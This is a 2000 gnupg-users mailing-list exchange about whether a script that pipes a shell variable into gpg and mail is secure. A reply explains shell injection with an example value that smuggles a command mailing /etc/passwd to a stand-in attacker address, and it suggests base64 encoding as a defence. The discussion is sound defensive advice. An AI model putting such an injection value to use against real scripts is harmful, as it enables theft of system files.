possible security hole

Derek Vokey turfdog@planetturf.ca
Mon, 4 Dec 2000 21:26:59 -0800


thank you for your input.
Could I bother you to "briefly" explain encoding to base64?

----- Original Message -----
From: "Jason Martin" <jhmartin@mail.com>
To: "Derek Vokey" <turfdog@planetturf.ca>
Cc: <gnupg-users@gnupg.org>
Sent: Monday, December 04, 2000 5:05 PM
Subject: Re: possible security hole



> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> I believe posible exploits are if $sensitiveinfo contains things like
> "blah; mail someone.evil@hacker.org </etc/passwd". The idea is that the
> shell can be tricked depending on $sensitiveinfo to do things you don't
> intend. Maybe if you base64 encode $sensitiveinfo first you'll be
> more-or-less immune from shell exploits. From a purely crypto point of
> view; I don't see anything wrong with this if we assume that
> $sensitiveinfo is guarenteed to have shell-safe values.
>
> - -Jason Martin
>
> > "echo $sensitiveinfo|gpg --homedir /my/home/dir --always-trust -ear
me|mail
> > to\@me.com"
> >
> > the script runs as nobody
> > the secret key has never seen the server
> > the script only encrypts
> > I don't care who the message comes from I only want the $sensitiveinfo
>
> - --
> PGP KeyID=0xEA954813
> Fingerprint:3B07 518C D76E 572F 7DAA 88A5 9763 835A EA95 4813
> finger jhmartin@pitr.scs.wsu.edu for key
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.4 (GNU/Linux)
> Comment: For info see http://www.gnupg.org
> Filter: gpg4pine 4.1 (http://azzie.robotics.net)
>
> iQEMBAERAgDMBQI6LD9snRSAAAAAAAgAjEdlZWtDb2RlIkdDUyBkLSBzKzogYS0t
> IEMrKyBVTCsrKysgUCsrIEwrKysgRS0tLSBXKysrIE4rKyBvLS0gSy0gdy0tLSBP
> LSBNLS0gVi0tIFBTKysgUEUgWSsrKyBQR1ArKysgdCsrKyA1KysgWCsgUiB0disg
> YisgREkrKysrIEQgRy0tIGUrKyBoIHIrKyB5PyIUFIAAAAAACQACU2xpbVNoYWR5
> bm8SFIAAAAAABgADTm9va2lleWVzAAoJEJdjg1rqlUgThWwAn1t+IvCo+II8Ey+2
> bGOvoUdPUac7AJ9wkqxWKGFJIHZqWlsNJ81K//2Tjw==
> =xi3u
> -----END PGP SIGNATURE-----
>
> --
> Archive is at http://lists.gnupg.org - Unsubscribe by sending mail
> with a subject of "unsubscribe" to gnupg-users-request@gnupg.org
>
-- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org